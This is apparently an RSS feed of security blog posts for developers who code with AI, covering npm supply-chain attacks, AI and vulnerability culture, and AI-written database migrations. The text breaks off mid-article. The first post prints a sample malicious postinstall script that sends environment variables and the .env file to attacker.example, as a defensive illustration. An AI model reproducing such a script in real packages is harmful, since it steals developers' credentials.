<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: LayerZero</title>
    <description>The latest articles on DEV Community by LayerZero (@layzerzero105).</description>
    <link>https://dev.to/layzerzero105</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3886969%2F83917794-7873-4114-92dd-33ca3c6996d4.jpeg</url>
      <title>DEV Community: LayerZero</title>
      <link>https://dev.to/layzerzero105</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/layzerzero105"/>
    <language>en</language>
    <item>
      <title>Your next supply-chain attack will come from a package you've never heard of</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Tue, 12 May 2026 05:32:16 +0000</pubDate>
      <link>https://dev.to/layzerzero105/your-next-supply-chain-attack-will-come-from-a-package-youve-never-heard-of-4dpl</link>
      <guid>https://dev.to/layzerzero105/your-next-supply-chain-attack-will-come-from-a-package-youve-never-heard-of-4dpl</guid>
      <description>&lt;h2&gt;
  
  
  Most developers think supply-chain attacks happen to other people. Then TanStack happened.
&lt;/h2&gt;

&lt;p&gt;Last week, a popular npm package in the TanStack ecosystem was compromised. Attackers pushed a malicious version that exfiltrated environment variables from any machine that ran &lt;code&gt;npm install&lt;/code&gt; during the window. Thousands of repos pulled it before anyone noticed.&lt;/p&gt;

&lt;p&gt;If you're shipping with AI, you're shipping someone else's code. A lot of it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The part nobody wants to admit
&lt;/h2&gt;

&lt;p&gt;When Cursor or Claude Code adds a dependency, you almost never read what it does. You skim the README, glance at the GitHub stars, and run &lt;code&gt;npm install&lt;/code&gt;. That's the workflow. That's also the attack surface.&lt;/p&gt;

&lt;p&gt;Here's the actual chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Your app → 12 direct deps → 400 transitive deps → 4,000 maintainers worldwide
          → any one of them gets phished → your .env is gone
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The TanStack incident wasn't sophisticated. The attacker didn't break crypto. They compromised one maintainer's npm token. That was enough.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "compromised" actually means for you
&lt;/h2&gt;

&lt;p&gt;Let's be concrete. A malicious postinstall script can do all of this before your terminal prompt comes back:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// postinstall.js — what a real attacker writes&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;execSync&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;child_process&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;https&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;cwd&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;cwd&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;USER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="c1"&gt;// grab the entire .env file too&lt;/span&gt;
  &lt;span class="na"&gt;dotenv&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;fs&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;utf8&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="nx"&gt;https&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://attacker.example/x&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;method&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;POST&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;
  &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's 12 lines. It runs the moment you install. By the time you see "added 1 package," your OpenAI key, your Stripe secret, and your database URL are already on someone else's server.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three changes that actually move the needle
&lt;/h2&gt;

&lt;p&gt;Most "supply-chain security" advice is theater. Audit logs you'll never read. SBOMs nobody parses. Here's what actually reduces blast radius:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Pin everything. Then verify the lockfile.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm config &lt;span class="nb"&gt;set &lt;/span&gt;save-exact &lt;span class="nb"&gt;true
&lt;/span&gt;npm ci  &lt;span class="c"&gt;# not npm install — ci fails if lockfile drifts&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Exact versions don't prevent the first attack, but they stop the silent auto-upgrade that turns one compromised package into thousands of compromised apps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Disable lifecycle scripts by default.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm config &lt;span class="nb"&gt;set &lt;/span&gt;ignore-scripts &lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This breaks some packages (anything that needs native compilation). That's a feature, not a bug. You'll learn which ones, and you'll vet them once instead of every install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Stop putting production secrets in your dev &lt;code&gt;.env&lt;/code&gt;.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is the one that hurts. Your dev machine shouldn't have access to production Stripe. It shouldn't have the prod database URL. If a postinstall script reads your &lt;code&gt;.env&lt;/code&gt;, the worst it should find is sandbox keys.&lt;/p&gt;

&lt;h2&gt;
  
  
  The uncomfortable truth
&lt;/h2&gt;

&lt;p&gt;You cannot read every dependency. You can't even read 1% of them. The TanStack maintainers couldn't, and they wrote the library.&lt;/p&gt;

&lt;p&gt;The defense isn't more reading. It's smaller blast radius. Pin versions. Kill postinstall. Keep prod secrets out of dev.&lt;/p&gt;

&lt;p&gt;Do those three things this week and the next TanStack-style incident will cost you a &lt;code&gt;git reset&lt;/code&gt;, not a customer notification email.&lt;/p&gt;




&lt;p&gt;If this saved you a 2am Slack message, follow LayerZero. We break down how the internet actually works for developers who ship with AI.&lt;/p&gt;

</description>
      <category>security</category>
      <category>webdev</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>AI Is Breaking Two Vulnerability Cultures — And Vibe Coders Are About to Get Caught in the Middle</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Sat, 09 May 2026 00:20:58 +0000</pubDate>
      <link>https://dev.to/layzerzero105/ai-is-breaking-two-vulnerability-cultures-and-vibe-coders-are-about-to-get-caught-in-the-middle-2j1e</link>
      <guid>https://dev.to/layzerzero105/ai-is-breaking-two-vulnerability-cultures-and-vibe-coders-are-about-to-get-caught-in-the-middle-2j1e</guid>
      <description>&lt;p&gt;Two security cultures used to coexist quietly. AI just broke both of them in the same quarter — and if you ship with Claude, Cursor, or Copilot, you are standing exactly where the fallout lands.&lt;/p&gt;

&lt;p&gt;This isn't a researcher's problem. It's a shipping-velocity problem. Yours.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the two cultures actually were
&lt;/h2&gt;

&lt;p&gt;For twenty years the security world ran on two parallel economies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Disclosure culture.&lt;/strong&gt; A researcher finds a bug, tells the vendor, the vendor patches, a CVE goes out, everyone learns. Slow, gentlemanly, reputation-driven. It worked because the supply of researchers was small and the currency was credit, not cash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bounty culture.&lt;/strong&gt; A platform pays researchers per bug. Supply scales with the budget. Bugs are graded. High-severity, high payout.&lt;/p&gt;

&lt;p&gt;Both cultures shared one quiet assumption: &lt;strong&gt;the cost of finding a bug is roughly equal to the value of finding it.&lt;/strong&gt; Researchers spent weeks for credit. Bounty rates matched effort. The economics balanced.&lt;/p&gt;

&lt;p&gt;AI just broke that assumption.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "broken" actually looks like
&lt;/h2&gt;

&lt;p&gt;In the last six months, two things happened that older security folks are still processing:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. AI-assisted vuln research collapsed the cost of finding low-hanging bugs.&lt;/strong&gt; A solo researcher with an LLM-driven fuzzer and an afternoon can now triage a codebase that used to take a team a week. Cost per bug found is cratering. Value per bug found is not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. AI-assisted exploit development collapsed the cost of weaponizing them.&lt;/strong&gt; Turning a bug into a working exploit used to require deep platform expertise. The gap between "found" and "weaponized" is now narrowing fast.&lt;/p&gt;

&lt;p&gt;Put those together and you get a culture problem:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Disclosure culture&lt;/strong&gt; assumed bugs trickle in. Vendors are buried. The 90-day disclosure window doesn't fit a world where one researcher files 40 bugs in a weekend.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bounty culture&lt;/strong&gt; assumed each bug took serious effort, so payouts were premium. Now anyone with $20/month of API credits can mass-submit. Programs are tightening criteria and quietly de-emphasizing volume.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both cultures evolved for a world where vulnerability discovery was an artisanal craft. AI turned it into industrial output.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this lands on vibe coders specifically
&lt;/h2&gt;

&lt;p&gt;Most security writers frame this as a researcher-vendor problem. It isn't. It's a problem for anyone who ships software with dependencies — which means you.&lt;/p&gt;

&lt;p&gt;Three concrete consequences in 2026:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Your dependencies will get bug-bombed faster than maintainers can patch.&lt;/strong&gt; That open-source library with one maintainer who answers issues on weekends is now attractive to AI-augmented researchers, scammers, and worms. CVEs in your tree will spike. Patch latency will spike harder.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. The exploit window after a CVE drops is shrinking from weeks to hours.&lt;/strong&gt; Used to be: CVE published, you had weeks before mass scanning started. Now: CVE published, AI scanners scrape it within hours and start probing every internet-facing service. Your "patch next sprint" timeline is obsolete.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Bug-bounty programs aren't going to save you.&lt;/strong&gt; If your security strategy is "we'll know when researchers tell us," that's a strategy that assumed a researcher economy that's being squeezed from both sides.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to actually do
&lt;/h2&gt;

&lt;p&gt;Three things, in impact-to-effort order.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Patch high-severity on a 7-day clock, not a sprint clock
&lt;/h3&gt;

&lt;p&gt;Automated dependency monitoring (Dependabot, Renovate, Snyk — pick one) and &lt;strong&gt;a 7-day patch SLA for anything CVSS 7+&lt;/strong&gt;. Not "we'll get to it." A calendar deadline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/dependabot.yml&lt;/span&gt;
&lt;span class="na"&gt;version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;
&lt;span class="na"&gt;updates&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;package-ecosystem&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;npm"&lt;/span&gt;
    &lt;span class="na"&gt;directory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/"&lt;/span&gt;
    &lt;span class="na"&gt;schedule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;daily"&lt;/span&gt;
    &lt;span class="na"&gt;open-pull-requests-limit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;20&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;security&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;urgent&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If a high-severity dep PR lives more than 7 days, that's a process failure.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Lock your supply chain in 30 minutes
&lt;/h3&gt;

&lt;p&gt;You don't need an SBOM platform. You need three things:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lockfile committed.&lt;/strong&gt; &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;pnpm-lock.yaml&lt;/code&gt;, &lt;code&gt;poetry.lock&lt;/code&gt; — committed, reviewed in PRs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pinned base images.&lt;/strong&gt; Not &lt;code&gt;node:latest&lt;/code&gt;. Not &lt;code&gt;node:20&lt;/code&gt;. &lt;code&gt;node:20.11.0-alpine3.19@sha256:...&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A way to grep your dependency tree.&lt;/strong&gt; &lt;code&gt;pnpm why &amp;lt;package&amp;gt;&lt;/code&gt; or equivalent. If you can't answer "do I depend on left-pad" in 60 seconds, attackers have the advantage.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Half an hour of work. Moves you from "vulnerable to whatever the world found this morning" to "I have a fighting chance."&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Assume your AI assistant will ship you a vulnerable line, and design for it
&lt;/h3&gt;

&lt;p&gt;Your Claude/Cursor/Copilot session is going to introduce a SQL injection, an XSS, or a leaked secret eventually. Not because the AI is bad — because the AI is fast, and faster code shipped without review &lt;em&gt;is&lt;/em&gt; the bug.&lt;/p&gt;

&lt;p&gt;Add a pre-commit linter for the most common AI-introduced mistakes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .pre-commit-config.yaml&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;repo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://github.com/zricethezav/gitleaks&lt;/span&gt;
  &lt;span class="na"&gt;rev&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v8.18.0&lt;/span&gt;
  &lt;span class="na"&gt;hooks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gitleaks&lt;/span&gt;    &lt;span class="c1"&gt;# catches accidental secret commits&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;repo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://github.com/PyCQA/bandit&lt;/span&gt;
  &lt;span class="na"&gt;rev&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1.7.5&lt;/span&gt;
  &lt;span class="na"&gt;hooks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bandit&lt;/span&gt;      &lt;span class="c1"&gt;# catches common Python security antipatterns&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Blunt tools. They miss things. They also catch 80% of AI-generated mistakes in two seconds per commit. That's a deal you take.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;The disclosure-versus-bounty debate is a red herring. The real shift is this: &lt;strong&gt;security used to be artisanal on both sides — defense reactive, offense reactive. AI made offense industrial. Defense hasn't caught up.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you wait for the security culture to figure itself out, you are betting that researchers, vendors, and bounty platforms will negotiate a new equilibrium before your stack gets bug-bombed. They will. But the negotiation will take years. Your CVE-to-exploit window is now hours.&lt;/p&gt;

&lt;p&gt;The vibe coders who ship safely in 2026 won't be the ones who memorized OWASP. They'll be the ones who set up automated patch pipelines, locked their supply chain, and added 30 seconds of pre-commit checks — then went back to building.&lt;/p&gt;

&lt;p&gt;The asymmetry is the point. Your attacker is using AI. Your defenses should too.&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;If you sell software in 2026, your security posture is going to come up in deals. It used to be enterprise-only — "are you SOC2." Now SaaS buyers ask because they got burned and they remember.&lt;/p&gt;

&lt;p&gt;When a B2B prospect asks "how do you handle vulnerabilities," the answer "we wait for researchers to tell us" is a deal-killer. "We patch high-severity CVEs in 7 days, lockfiles committed, pre-commit security linting" is a wedge — and it's two days of setup. Cheapest sales differentiator you'll find this quarter.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do today
&lt;/h2&gt;

&lt;p&gt;Run &lt;code&gt;npm audit&lt;/code&gt;, &lt;code&gt;pip-audit&lt;/code&gt;, or &lt;code&gt;bundle audit&lt;/code&gt; on your project right now. Count the high-severity issues. Set a calendar reminder for 7 days from today. Patch them by then. That's the bar — not "review and see what we can do." Patch them.&lt;/p&gt;

&lt;p&gt;Then add Dependabot, then add gitleaks, then go ship.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for security and infrastructure that vibe coders can actually use. Next: the four supply-chain attacks that will hit npm and PyPI in 2026 — and the one-line guard that stops three of them.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>Stop Letting AI Write Your Database Migrations</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Wed, 06 May 2026 18:47:03 +0000</pubDate>
      <link>https://dev.to/layzerzero105/stop-letting-ai-write-your-database-migrations-alh</link>
      <guid>https://dev.to/layzerzero105/stop-letting-ai-write-your-database-migrations-alh</guid>
      <description>&lt;p&gt;A vibe coder I follow lost two days of customer data last weekend.&lt;/p&gt;

&lt;p&gt;Not from a hack. Not from a hardware failure. From a single AI-generated migration that a senior engineer would have caught in 10 seconds.&lt;/p&gt;

&lt;p&gt;If you're shipping with Claude, Cursor, Copilot, or any agent that touches your schema, you need to read this before you run another &lt;code&gt;migrate&lt;/code&gt; command.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually goes wrong
&lt;/h2&gt;

&lt;p&gt;AI is genuinely good at writing application code. It pattern-matches against millions of similar codebases and produces plausible code fast. For most things — components, handlers, glue logic — that's enough. If it's wrong, you re-render. You re-run. You ship a fix.&lt;/p&gt;

&lt;p&gt;Database migrations are different. They have one property the AI quietly ignores: &lt;strong&gt;they execute exactly once, and the wrong sequence is unrecoverable without a backup.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Three failure modes I've now seen in the wild:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Silent column drops.&lt;/strong&gt; The AI "improves" a migration by removing what it thinks is a dead column. The column had three months of customer data. The migration runs in production. The column is gone. You restore from backup and lose everything written since the snapshot.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Type changes that truncate.&lt;/strong&gt; Convert a &lt;code&gt;TEXT&lt;/code&gt; to &lt;code&gt;VARCHAR(255)&lt;/code&gt;? Sure, the AI will do that. The 12 customers whose addresses were 280 characters? Their addresses are now 255 characters and the suffix is in the trash bin.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Backwards-incompatible renames mid-deploy.&lt;/strong&gt; The AI renames &lt;code&gt;user_email&lt;/code&gt; to &lt;code&gt;email&lt;/code&gt; because "it's cleaner." The old version of your app, still running on half your boxes during the rolling deploy, throws 500s for 90 seconds. Customers see them.&lt;/p&gt;

&lt;p&gt;None of these are bugs in the AI. The AI did what you asked. The bug is that you're using AI like a junior dev who needs review, except the review never happened.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why migrations are the worst case for AI
&lt;/h2&gt;

&lt;p&gt;Most AI failures are recoverable. You ship a bad component, you redeploy the previous version. You commit a typo, you push a fix. The blast radius is contained to "the next 30 seconds of users."&lt;/p&gt;

&lt;p&gt;Migrations break that pattern in three ways:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;They modify shared, mutable state.&lt;/strong&gt; Code is reproducible from git. Data is not.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;They run irreversibly.&lt;/strong&gt; "Down migrations" exist in theory. In practice, they don't roll back data deletes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;They touch every customer simultaneously.&lt;/strong&gt; A bad migration is not a 5% bug. It's a 100% bug across your entire customer base in one transaction.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The combination — irreversibility, shared state, fanout — is exactly the property AI shouldn't be trusted with unsupervised. And yet it's the one most vibe coders trust it with the most, because writing migrations is boring and AI is happy to do boring work.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "review" actually means for migrations
&lt;/h2&gt;

&lt;p&gt;When I say "don't let AI run migrations unreviewed," I don't mean "skim the diff before clicking yes."&lt;/p&gt;

&lt;p&gt;I mean this checklist, every time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Before running ANY AI-generated migration, answer:&lt;/span&gt;

&lt;span class="c1"&gt;-- 1. What columns/tables does this DROP? (grep for DROP, ALTER ... DROP)&lt;/span&gt;
&lt;span class="c1"&gt;-- 2. What types does this CHANGE? (ALTER ... TYPE)&lt;/span&gt;
&lt;span class="c1"&gt;-- 3. What constraints does this ADD that could fail? (NOT NULL on existing column, UNIQUE)&lt;/span&gt;
&lt;span class="c1"&gt;-- 4. What renames does this do? (RENAME TO, RENAME COLUMN)&lt;/span&gt;
&lt;span class="c1"&gt;-- 5. Does this run in a transaction? (BEGIN / COMMIT?)&lt;/span&gt;
&lt;span class="c1"&gt;-- 6. Could this lock the table for more than 1 second on production data?&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you can't answer all six in 30 seconds, the migration isn't reviewed. It's been glanced at. Those are not the same thing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Concrete defenses for vibe coders
&lt;/h2&gt;

&lt;p&gt;You don't need to become a DBA. You need three guardrails.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Always run migrations on a production-clone first
&lt;/h3&gt;

&lt;p&gt;Most managed Postgres providers (Supabase, Neon, Render) let you branch the database. Branch it, run the migration on the branch, run smoke tests. If it explodes, it explodes on the branch.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Neon example&lt;/span&gt;
neon branches create &lt;span class="nt"&gt;--name&lt;/span&gt; migration-test
neon migrations apply &lt;span class="nt"&gt;--branch&lt;/span&gt; migration-test
&lt;span class="c"&gt;# run tests against the branch&lt;/span&gt;
neon branches delete migration-test  &lt;span class="c"&gt;# if it worked, apply to main&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Five minutes of work. Catches 90% of disasters.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Forbid destructive operations in CI
&lt;/h3&gt;

&lt;p&gt;Add a check to your migration pipeline that fails if the SQL contains certain keywords without an explicit override:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# In your CI, before applying migrations:&lt;/span&gt;
&lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"DROP COLUMN|DROP TABLE|ALTER.*TYPE"&lt;/span&gt; migrations/&lt;span class="k"&gt;*&lt;/span&gt;.sql&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
  &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Destructive migration detected. Set MIGRATION_DESTRUCTIVE_OK=1 to override."&lt;/span&gt;
  &lt;span class="o"&gt;[&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$MIGRATION_DESTRUCTIVE_OK&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"1"&lt;/span&gt; &lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;exit &lt;/span&gt;1
&lt;span class="k"&gt;fi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now every destructive migration requires a deliberate human decision. The AI can't override it. You can't accidentally merge it. The friction is the feature.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Always back up immediately before applying
&lt;/h3&gt;

&lt;p&gt;Every migration runner should have a "snapshot before apply" step. If it doesn't, write one:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
